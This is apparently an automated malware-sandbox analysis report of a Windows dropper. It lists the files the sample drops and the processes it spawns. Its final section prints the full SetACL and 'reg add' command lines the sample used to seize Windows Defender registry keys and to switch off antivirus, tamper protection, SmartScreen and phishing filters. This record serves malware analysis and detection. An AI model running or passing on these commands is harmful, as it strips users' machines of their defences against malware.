Source: 3Dut8dFCwD.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdbG source: SetACL64.exe, 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2067201156.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: Binary string: D:\Projects\New\win_version_csharp\obj\Release\win_version_csharp.pdb source: 3Dut8dFCwD.exe, 00000000.00000002.2215426032.0000000000789000.00000004.00000001.01000000.00000003.sdmp, win_version_csharp.exe.0.dr
Source: Binary string: D:\Projects\ConsoleApplication9\ConsoleApplication9\obj\Release\ConsoleApplication9.pdb source: cabweejcuqvpws.exe.0.dr
Source: Binary string: D:\Code\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: SetACL64.exe, 00000004.00000002.2069293498.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000004.00000000.2067201156.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000000.2069740912.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000005.00000002.2070784013.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000000.2071297477.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000006.00000002.2072969923.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000000.2073515218.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000007.00000002.2074479225.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000002.2077480950.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000008.00000000.2075003678.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000002.2080342564.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 00000009.00000000.2079502017.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000000.2080706162.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000A.00000002.2081680531.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000000.2082080355.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe, 0000000B.00000002.2083243826.00007FF69709B000.00000002.00000001.01000000.00000005.sdmp, SetACL64.exe.0.dr
Source: win_version_csharp.exe.0.drStatic PE information: 0xEFE04B64 [Fri Jul 12 07:53:08 2097 UTC]
Source: SetACL64.exe.0.drStatic PE information: section name: _RDATA

Persistence and Installation Behavior

barindex
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exe
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: reg.exeJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeFile created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeFile created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exeJump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeFile created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeFile created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeJump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeFile created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\win_version_csharp.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697071DAC GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,4_2_00007FF697071DAC
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\PowerRun64.exeJump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\cabweejcuqvpws.exeJump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\nsExec.dllJump to dropped file
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\win_version_csharp.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_4-43007
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeAPI coverage: 9.6 %
Source: C:\Users\user\Desktop\3Dut8dFCwD.exe TID: 5608Thread sleep count: 130 > 30Jump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_00405C40 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405C40
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_00406891 FindFirstFileW,FindClose,0_2_00406891
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeCode function: 0_2_00402910 FindFirstFileW,0_2_00402910
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,4_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF6970596D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,4_2_00007FF69706CF15
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69708C76C _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,FindClose,5_2_00007FF69708C76C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970596D0 FindFirstFileW,GetLastError,FindNextFileW,FindClose,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF6970596D0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF69706CF15 MoveFileExW,FindFirstFileW,GetLastError,FindNextFileW,DeleteFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,5_2_00007FF69706CF15
Source: SetACL64.exe, 00000005.00000002.2070425441.000001890B657000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllK
Source: SetACL64.exe, 00000004.00000002.2068840743.000001BD79A17000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqqw
Source: SetACL64.exe, 00000006.00000002.2072226192.0000028B93EF1000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 00000007.00000002.2074288448.000002256D1A8000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 00000009.00000002.2080111958.000002544A948000.00000004.00000020.00020000.00000000.sdmp, SetACL64.exe, 0000000A.00000002.2081460809.000001DDB8614000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: SetACL64.exe, 00000008.00000002.2076437537.000001F7FECD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvv
Source: SetACL64.exe, 0000000B.00000002.2083074027.0000029B8B3A7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeAPI call chain: ExitProcess graph end nodegraph_0-3464
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970786C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF6970786C8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF69708D744 GetProcessHeap,4_2_00007FF69708D744
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF6970786C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF6970786C8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697073034 SetUnhandledExceptionFilter,4_2_00007FF697073034
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697072E8C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00007FF697072E8C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 4_2_00007FF697072AE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00007FF697072AE0
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF6970786C8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF6970786C8
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF697073034 SetUnhandledExceptionFilter,5_2_00007FF697073034
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF697072E8C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00007FF697072E8C
Source: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exeCode function: 5_2_00007FF697072AE0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00007FF697072AE0
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\p64.batJump to behavior
Source: C:\Users\user\Desktop\3Dut8dFCwD.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\Signature Updates" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn setowner -ownr "n:Administrators"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender" /v "DisableAntiVirus" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtection" /t reg_DWORD /d "4" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Features" /v "TamperProtectionSource" /t reg_DWORD /d "2" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\UX Configuration" /v "DisablePrivacyMode" /t reg_DWORD /d "1" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontOfferThroughWUAU" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MRT" /v "DontReportInfectionInformation" /t reg_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\RemovalTools\MpGears" /v "SpyNetReportingLocation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\System" /v "EnableSmartScreen" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "EnabledV9" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer\PhishingFilter" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\SOFTWARE\Policies\Microsoft\Edge" /v "SmartScreenEnabled" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "SmartScreenEnabled" /t reg_SZ /d "Off" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\nsm4D39.tmp\SetACL64.exe SetACL64 -on "HKLM\SOFTWARE\Microsoft\Windows Defender" -ot reg -actn ace -ace "n:Administrators;p:full"Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "PUAProtection" /t reg_DWORD /d "0" /fJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /fJump to behavior
